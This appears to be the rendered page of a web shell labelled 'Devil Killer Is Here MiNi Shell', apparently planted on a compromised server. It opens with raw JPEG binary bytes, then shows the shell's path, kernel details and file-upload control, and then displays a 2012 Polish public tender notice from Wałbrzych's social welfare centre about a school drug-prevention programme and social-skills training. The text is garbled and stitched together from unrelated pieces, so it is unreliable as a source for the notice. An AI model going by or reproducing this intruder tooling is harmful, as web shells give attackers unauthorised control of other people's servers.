JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121015/397524-N-2012.html

<p class="kh_header"><b>Wałbrzych: Usługa związana z organizacją i przeprowadzeniem działań z zakresu programu
profilaktycznego odnośnie przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli oraz przeprowadzenie 88 godzin zegarowych zajęć dla grupy 30 osób zagrożonych wykluczeniem społecznym z zakresu treningu umiejętności społecznych w projekcie Powrót do aktywności</b><br>
<b>Numer ogłoszenia: 397524 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Beethovena 1-2, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 6640800, faks 0-74 6640800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.walbrzych.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa związana z organizacją i przeprowadzeniem działań z zakresu programu
profilaktycznego odnośnie przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli oraz przeprowadzenie 88 godzin zegarowych zajęć dla grupy 30 osób zagrożonych wykluczeniem społecznym z zakresu treningu umiejętności społecznych w projekcie Powrót do aktywności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Część I - Podzadanie Nr 1 - Opracowanie i przeprowadzenie programu profilaktycznego z zakresu przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli. 
b)	planowany termin realizacji - od daty zawarcia umowy do 21 grudnia 2012 r.
c)	celem przedmiotowej usługi jest opracowanie i przeprowadzenie programu profilaktycznego z zakresu przeciwdziałania narkomanii, dla młodzieży, rodziców i nauczycieli wałbrzyskich szkół gimnazjalnych w formie warsztatowej.
d)	łączna ilość godzin warsztatowych w programie winna wynosić 160 godzin zegarowych:
1.	64 godziny zegarowe - zajęcia dla uczniów,
2.	48 godzin zegarowych - zajęcia dla grona pedagogicznego,
3.	48 godzin zegarowych - zajęcia dla rodziców.

e)	programem objęte będzie 8 placówek gimnazjalnych z terenu Gminy Wałbrzych.  
f)	wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia.
g)	wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć,
h)	wykonawca jest zobowiązany do nawiązania współpracy z dyrektorami wszystkich wałbrzyskich szkół gimnazjalnych, ustalenia szczegółowego harmonogramu szkoleń i planu pracy. Wykonawca przedstawi przedmiotowy plan pracy Zamawiającemu przed rozpoczęciem wykonywania usługi.    
i)	usługa będzie realizowana w siedzibach wałbrzyskich szkół gimnazjalnych. 
j)	zajęcia kierowane do uczniów powinny uwzględniać w swej tematyce zagadnienia związane z profilaktyką uzależnień od narkotyków, w tym: edukację z zakresu uzależnień i szkód związanych z uzależnieniem, dostarczenie wiedzy na temat skutecznych i bezpiecznych form pomocy dla osób mających problem z używaniem i uzależnieniem od środków odurzających, naukę radzenia sobie z problemami przy wykorzystaniu własnych zasobów.
k)	zajęcia kierowane do nauczycieli i rodziców powinny uwzględniać w swej tematyce edukację z zakresu uzależnień, sposobów interweniowania wobec osoby uzależnionej i sięgającej po środki psychoaktywne, naukę rozpoznawania sygnałów świadczących o zażywaniu substancji psychoaktywnych i sposobów interwencji wobec takiej osoby, zwiększenie świadomości dotyczącej zjawiska uzależnień wśród młodzieży. 
l)	wykonawca będzie zobowiązany do dostarczenia listy z podpisami uczestników szkolenia oraz wykaz przepracowanych godzin, potwierdzonych przez dyrektora danej placówki oświatowej. Ponadto Wykonawca raz w miesiącu przygotuje sprawozdanie z wykonanego zadania.

2. Część II - Podzadanie Nr 2 - przeprowadzenie 88 godzin zegarowych zajęć dla grupy 30 osób zagrożonych wykluczeniem społecznym z zakresu treningu umiejętności społecznych. Termin realizacji zamówienia - 1.12.2012 - 28.02.2013 r. Zajęcia w ramach treningu podzielone będą na cztery moduły tematyczne: 
1)	Moduł I (integracyjne zajęcia wyjazdowe) - Skuteczna komunikacja - zajęcia o charakterze  integracyjnym - łącznie 16 godzin zajęć. Grupa 30-osobowa. Planowany termin realizacji - XII 2012 r. (2 dni po 8 godzin zajęć). W ramach realizacji zajęć Zamawiający założył następującą tematykę:
a)	zrozumienie swoich relacji z grupą,
b)	doskonalenia zachowań w trudnych i konfliktowych sytuacjach z ludźmi,
c)	nauka budowania dobrego kontaktu i porozumienia z innymi. 

1.1	Informacje dodatkowe dotyczące realizacji modułu wyjazdowego:

1.1.1	Miejsce przeprowadzenia zajęć wyjazdowych - Szklarska Poręba,
1.1.2	W ramach organizacji modułu Wykonawca zobowiązany będzie do:
a)	zapewnienia zakwaterowania dla 30 uczestników projektu, 2 opiekunów w pokoju 2-osobowym oraz trenera w pokoju 1-osobowym, wyżywienia w postaci śniadania, dwóch obiadów oraz jednej kolacji w postaci stołu szwedzkiego, 
b)	zapewnienie czterech przerw kawowych w formie słodkiego bufetu w przerwach między szkoleniami,
c)	zapewnienie odpowiednio dostosowanej sali szkoleniowej, wyposażonej w rzutnik, tablicę flipchart itp.
d)	zapewniania materiałów szkoleniowych niezbędnych do przeprowadzenia zajęć.
e)	zapewnienie transportu do miejsca organizacji zajęć i z powrotem,

1.1.3	Plan pobytu:

a)	Dzień I - przyjazd grupy oraz zakwaterowanie uczestników - około godz. 9.00
b)	Rozpoczęcie zajęć około godziny 10.00 - 8 godzin zegarowych zajęć (w przerwie obiad i dwie przerwy kawowe, po zakończonych zajęciach kolacja),
c)	Dzień II - śniadanie około godziny 9.00, następnie zajęcia - 8 godzin zegarowych zajęć (w przerwie obiad i dwie przerwy kawowe). Wyjazd grupy ok. godz. 18.00.

2)	Moduł II - Wyznaczanie celów życiowych - łącznie 24 godziny zajęć (4 dni po 6 godzin zajęć). Zajęcia prowadzone w formie warsztatowej dla jednej grupy 30-osobowej. W ramach realizacji zajęć Zamawiający założył następującą tematykę:

a)	rozwijanie kompetencji interpersonalnych i samopoznawczych,
b)	zwiększenie skuteczności osobistej w odnoszeniu sukcesów.

3) Moduł III - Zarządzanie własnym potencjałem - łącznie 24 godzin  zajęć (4 dni po 6 godzin zajęć). Zajęcia prowadzone w formie warsztatowej w jednej grupie 30-osobowej. W ramach realizacji zajęć Zamawiający założył następującą tematykę: 

a)	doskonalenie koncepcji swojego JA i wiary we własne możliwości w aspekcie interpersonalnym,
b)	rozwijanie własnych zasobów inteligencji emocjonalnej.

4) Moduł IV - Sztuka rozwiązywania konfliktów  - łącznie 24 godzin zajęć (4 dni po 6 godzin zajęć). Zajęcia prowadzone w formie warsztatowej w jednej grupie 30-osobowej. W ramach realizacji zajęć Zamawiający założył następującą tematykę: 
		
a)	rodzaje, przyczyny i konsekwencje konfliktów,
b)	sposoby rozwiązywania konfliktów.  
	
 Inne istotne warunki dotyczące przedmiotu zamówienia:

1)	W ramach świadczonej usługi Wykonawca będzie zobowiązany do:
a)	zapewnienia uczestnikom zajęć jednego ciepłego posiłku w trakcie trwania zajęć, składającego się z dwóch dań - zupy oraz drugiego dania wraz z napojami.
b)	Opracowania wzoru certyfikatu dla uczestników zajęć (zawierającego odpowiednie ologowania) poświadczającego udział w zajęciach oraz  ich ukończenie. 
c)	opracowania szczegółowego programu szkolenia w zakresie niezbędnym do przeprowadzenia zajęć,  
d)	opracowania testu wiedzy na zakończenie każdego z modułów zajęć oraz kwestionariusza obserwacji na początku oraz końcu treningu.
e)	przygotowania raportu końcowego z przeprowadzonych zajęć,
f)	poniesienia kosztów związanych z ubezpieczeniem uczestników poszczególnych zajęć od następstw nieszczęśliwych wypadków (NNW),
g)	prowadzenia na bieżąco dokumentacji dotyczącej prowadzonych zajęć, w szczególności list obecności uczestników zajęć oraz dziennika zajęć.
h)	zapewnienia trenera, posiadającego wykształcenia wyższe, o kierunku pedagogicznym, psychologicznym lub socjologicznym, posiadającego co najmniej roczne doświadczenie w zakresie pracy z osobami zagrożonymi wykluczeniem społecznym,
i)	opracowania materiałów szkoleniowych niezbędnych do przeprowadzenia zajęć (wydruk 
i oprawienie materiałów będzie leżało po stronie Zamawiającego).

2)	Zamawiający informuje, iż zajęcia stacjonarne w ramach modułu II, III oraz IV odbywać się będą w pomieszczeniach zapewnionych i wskazanych przez Zamawiającego, tj. w Centrum Integracji Rodziny przy ul. Grota Roweckiego 3 w Wałbrzychu.
3)	Zajęcia stacjonarne będą odbywały się zgodnie z ustalonym harmonogramem w dniach roboczych, w godzinach pomiędzy 8.00 a 15.00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.00.00.00-9, 80.52.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podzadanie Nr 1 - co najmniej 1 usługa odpowiadająca swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. usługę polegającą na organizacji i przeprowadzeniu usługi z zakresu programu profilaktycznego odnośnie przeciwdziałania narkomanii zrealizowanej w ramach jednej umowy zawartej z jednym Zamawiającym,
Podzadanie Nr 2 - co najmniej 1 usługa odpowiadająca swoim rodzajem usługę stanowiącą przedmiot zamówienia, tj. usługę polegającą na przeprowadzeniu warsztatów z treningu umiejętności społecznych, sesji lub treningów psychologicznych obejmujących swoim zakresem grupę co najmniej 10 uczestników w ramach jednej umowy zawartej z jednym Zamawiającym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podzadanie Nr 1 - zamawiający nie stawia żadnych wymagań w tym zakresie
Podzadanie Nr 2 - wykonawca zobowiązany będzie do zapewnienia osoby (trenera) posiadającej wykształcenie wyższe o kierunku psychologicznym, socjologicznym lub pedagogicznym, posiadającej co najmniej 3 - miesięczne doświadczenie w zakresie pracy z osobami zagrożonymi wykluczeniem społecznym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy w zakresie spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Umowa może być zmieniona w stosunku do treści złożonej oferty na niżej  	wymienionych warunkach:
1) w stosunku do terminu realizacji umowy - terminu wykonania zamówienia w przypadku gdy konieczność jego wprowadzenia wynikła z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
2) w stosunku do osób -  w sytuacji zmiany osób reprezentujących w przypadku zmian organizacyjnych,

2. Wszelkie zmiany do umowy wymagają zgody Zamawiającego oraz będą wprowadzane do umowy w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Wałbrzychu, ul. Beethovena 1-2, 58-300 Wałbrzych - pok. 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Wałbrzychu, ul. Beethovena 1-2, 58-300 Wałbrzych - pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w zakresie Podzadania Nr 2 jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet VII,  Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podzadanie Nr 1 - Opracowanie i przeprowadzenie programu profilaktycznego z zakresu przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> b)	planowany termin realizacji - od daty zawarcia umowy do 21 grudnia 2012 r.
c)	celem przedmiotowej usługi jest opracowanie i przeprowadzenie programu profilaktycznego z zakresu przeciwdziałania narkomanii, dla młodzieży, rodziców i nauczycieli wałbrzyskich szkół gimnazjalnych w formie warsztatowej.
d)	łączna ilość godzin warsztatowych w programie winna wynosić 160 godzin zegarowych:
1.	64 godziny zegarowe - zajęcia dla uczniów,
2.	48 godzin zegarowych - zajęcia dla grona pedagogicznego,
3.	48 godzin zegarowych - zajęcia dla rodziców.

e)	programem objęte będzie 8 placówek gimnazjalnych z terenu Gminy Wałbrzych.  
f)	wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia.
g)	wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć,
h)	wykonawca jest zobowiązany do nawiązania współpracy z dyrektorami wszystkich wałbrzyskich szkół gimnazjalnych, ustalenia szczegółowego harmonogramu szkoleń i planu pracy. Wykonawca przedstawi przedmiotowy plan pracy Zamawiającemu przed rozpoczęciem wykonywania usługi.    
i)	usługa będzie realizowana w siedzibach wałbrzyskich szkół gimnazjalnych. 
j)	zajęcia kierowane do uczniów powinny uwzględniać w swej tematyce zagadnienia związane z profilaktyką uzależnień od narkotyków, w tym: edukację z zakresu uzależnień i szkód związanych z uzależnieniem, dostarczenie wiedzy na temat skutecznych i bezpiecznych form pomocy dla osób mających problem z używaniem i uzależnieniem od środków odurzających, naukę radzenia sobie z problemami przy wykorzystaniu własnych zasobów.
k)	zajęcia kierowane do nauczycieli i rodziców powinny uwzględniać w swej tematyce edukację z zakresu uzależnień, sposobów interweniowania wobec osoby uzależnionej i sięgającej po środki psychoaktywne, naukę rozpoznawania sygnałów świadczących o zażywaniu substancji psychoaktywnych i sposobów interwencji wobec takiej osoby, zwiększenie świadomości dotyczącej zjawiska uzależnień wśród młodzieży. 
l)	wykonawca będzie zobowiązany do dostarczenia listy z podpisami uczestników szkolenia oraz wykaz przepracowanych godzin, potwierdzonych przez dyrektora danej placówki oświatowej. Ponadto Wykonawca raz w miesiącu przygotuje sprawozdanie z wykonanego zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 80.52.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przeprowadzenie 88 godzin zegarowych zajęć dla grupy 30 osób zagrożonych wykluczeniem społecznym z zakresu treningu umiejętności społecznych w projekcie  - powrót do aktywności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia w ramach treningu podzielone będą na cztery moduły tematyczne: 
1)	Moduł I (integracyjne zajęcia wyjazdowe) - Skuteczna komunikacja - zajęcia o charakterze  integracyjnym - łącznie 16 godzin zajęć. Grupa 30-osobowa. Planowany termin realizacji - XII 2012 r. (2 dni po 8 godzin zajęć). W ramach realizacji zajęć Zamawiający założył następującą tematykę:
a)	zrozumienie swoich relacji z grupą,
b)	doskonalenia zachowań w trudnych i konfliktowych sytuacjach z ludźmi,
c)	nauka budowania dobrego kontaktu i porozumienia z innymi. 

1.1	Informacje dodatkowe dotyczące realizacji modułu wyjazdowego:

1.1.1	Miejsce przeprowadzenia zajęć wyjazdowych - Szklarska Poręba,
1.1.2	W ramach organizacji modułu Wykonawca zobowiązany będzie do:
a)	zapewnienia zakwaterowania dla 30 uczestników projektu, 2 opiekunów w pokoju 2-osobowym oraz trenera w pokoju 1-osobowym, wyżywienia w postaci śniadania, dwóch obiadów oraz jednej kolacji w postaci stołu szwedzkiego, 
b)	zapewnienie czterech przerw kawowych w formie słodkiego bufetu w przerwach między szkoleniami,
c)	zapewnienie odpowiednio dostosowanej sali szkoleniowej, wyposażonej w rzutnik, tablicę flipchart itp.
d)	zapewniania materiałów szkoleniowych niezbędnych do przeprowadzenia zajęć.
e)	zapewnienie transportu do miejsca organizacji zajęć i z powrotem,

1.1.3	Plan pobytu:

a)	Dzień I - przyjazd grupy oraz zakwaterowanie uczestników - około godz. 9.00
b)	Rozpoczęcie zajęć około godziny 10.00 - 8 godzin zegarowych zajęć (w przerwie obiad i dwie przerwy kawowe, po zakończonych zajęciach kolacja),
c)	Dzień II - śniadanie około godziny 9.00, następnie zajęcia - 8 godzin zegarowych zajęć (w przerwie obiad i dwie przerwy kawowe). Wyjazd grupy ok. godz. 18.00.

